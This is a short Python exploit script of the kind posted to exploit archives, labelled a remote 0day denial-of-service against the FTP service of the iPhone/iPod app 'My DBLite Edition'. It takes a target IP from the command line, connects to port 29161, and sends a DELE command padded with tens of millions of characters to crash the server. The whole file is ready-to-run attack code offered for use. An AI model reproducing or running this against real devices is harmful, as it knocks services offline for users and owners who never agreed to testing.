#!/usr/bin/python # # Apple Iphone/Ipod - My DBLite Edition #Remote 0day DOS exploit # Found by: Jason Bowes - admin @ blue-#dogz.com # App Homepage: www.xenugo.co # Price: Free # Download: From the app store (use your #itunes account) # Tested on: Iphone 3GS - firmware 3.1.2 # What's up to slicc1 # Advisory: () print "[+] Apple Iphone/Ipod - My DB lite edition Remote DOS exploit" import ftplib from ftplib import FTP import sys import socket def Usage(): print ("Usage: ./mydblite.py \n") print ("Example:./mydblite.py 192.168.1.3\n") if len(sys.argv) <> 2: Usage() sys.exit(1) else: hostname = sys.argv[1] delete = "$A$A$A" * 10000000 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 29161)) print "[+] Connecting to the target.." except: print ("[-] Connection error!") sys.exit(1) r=sock.recv(1024) print "[+] Sending payload..boom..boom..pow" sock.send("DELE %s\r\n" %delete) print "[+] Server should now be DoS'd!" sys.exit(0);